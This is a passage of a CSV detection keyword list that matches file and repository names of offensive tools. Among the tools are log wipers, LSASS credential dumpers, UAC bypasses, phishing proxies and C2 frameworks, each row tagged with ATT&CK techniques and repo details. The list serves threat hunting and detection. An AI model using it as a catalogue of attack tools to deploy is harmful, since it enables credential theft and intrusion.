Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*/EventCleaner.exe*",".{0,1000}\/EventCleaner\.exe.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*/EventCleaner.git*",".{0,1000}\/EventCleaner\.git.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*/EventLogCrasher.git*",".{0,1000}\/EventLogCrasher\.git.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*/EventViewerUAC/*",".{0,1000}\/EventViewerUAC\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*/EventViewerUAC/*",".{0,1000}\/EventViewerUAC\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","128","30","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" "*/EventViewer-UACBypass*",".{0,1000}\/EventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer 
which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*/evil.cpp*",".{0,1000}\/evil\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*/evil.dll*",".{0,1000}\/evil\.dll.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*/evil.ps1*",".{0,1000}\/evil\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/evil_pdf/*",".{0,1000}\/evil_pdf\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/evil_script.py*",".{0,1000}\/evil_script\.py.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/EvilClippy*",".{0,1000}\/EvilClippy.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
"*/EvilClippy-*.zip*",".{0,1000}\/EvilClippy\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*/evilclippy.cs*",".{0,1000}\/evilclippy\.cs.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*/EvilClippy.git*",".{0,1000}\/EvilClippy\.git.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*/evilginx*",".{0,1000}\/evilginx.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*/evilginx2.git*",".{0,1000}\/evilginx2\.git.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" 
"*/evilginx2/*",".{0,1000}\/evilginx2\/.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*/evilhost:*",".{0,1000}\/evilhost\:.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/EvilLsassTwin*",".{0,1000}\/EvilLsassTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*/EvilLsassTwin/*",".{0,1000}\/EvilLsassTwin\/.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*/EvilnoVNC.git*",".{0,1000}\/EvilnoVNC\.git.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*/EvilnoVNC.git*",".{0,1000}\/EvilnoVNC\.git.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*/evil-proxy.git*",".{0,1000}\/evil\-proxy\.git.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - 
TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*/evil-proxy.rb*",".{0,1000}\/evil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*/evil-proxy/*",".{0,1000}\/evil\-proxy\/.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*/evilqr.git*",".{0,1000}\/evilqr\.git.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*/evilrdp.git*",".{0,1000}\/evilrdp\.git.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*/evilrdp/*",".{0,1000}\/evilrdp\/.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 
- T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*/evilscript.ps1*",".{0,1000}\/evilscript\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/evilSignatures.db*",".{0,1000}\/evilSignatures\.db.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*/EvilSln.git*",".{0,1000}\/EvilSln\.git.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*/EvilSln/*.suo*",".{0,1000}\/EvilSln\/.{0,1000}\.suo.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*/EvilTwinServer*",".{0,1000}\/EvilTwinServer.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to 
LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*/EvtMute.git*",".{0,1000}\/EvtMute\.git.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*/Example_C2_Profile*",".{0,1000}\/Example_C2_Profile.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/Example_Payload_Type/*",".{0,1000}\/Example_Payload_Type\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/ExcelDocWriter.cs*",".{0,1000}\/ExcelDocWriter\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/exchanger.py*",".{0,1000}\/exchanger\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/exe_to_dll.git*",".{0,1000}\/exe_to_dll\.git.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE into a DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*/exe_to_dll.git*",".{0,1000}\/exe_to_dll\.git.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*/exe2powershell*",".{0,1000}\/exe2powershell.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a 
bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*/exec_bin.c*",".{0,1000}\/exec_bin\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/exec_dll.c*",".{0,1000}\/exec_dll\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/exec_psexec*",".{0,1000}\/exec_psexec.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/exec_psh.c*",".{0,1000}\/exec_psh\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/exec_wmi*",".{0,1000}\/exec_wmi.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/exec0.py*",".{0,1000}\/exec0\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/Executable_Files.git*",".{0,1000}\/Executable_Files\.git.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*/execute_shellcode.exe*",".{0,1000}\/execute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" 
"*/execute-api.eu-central-1.amazonaws.com/catspin_deployed*",".{0,1000}\/execute\-api\.eu\-central\-1\.amazonaws\.com\/catspin_deployed.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*/execve_hijack*",".{0,1000}\/execve_hijack.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/exegol.py*",".{0,1000}\/exegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/exegol_user_sources.list*",".{0,1000}\/exegol_user_sources\.list.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*/exegol-docker-build/*",".{0,1000}\/exegol\-docker\-build\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/Exegol-history/*",".{0,1000}\/Exegol\-history\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 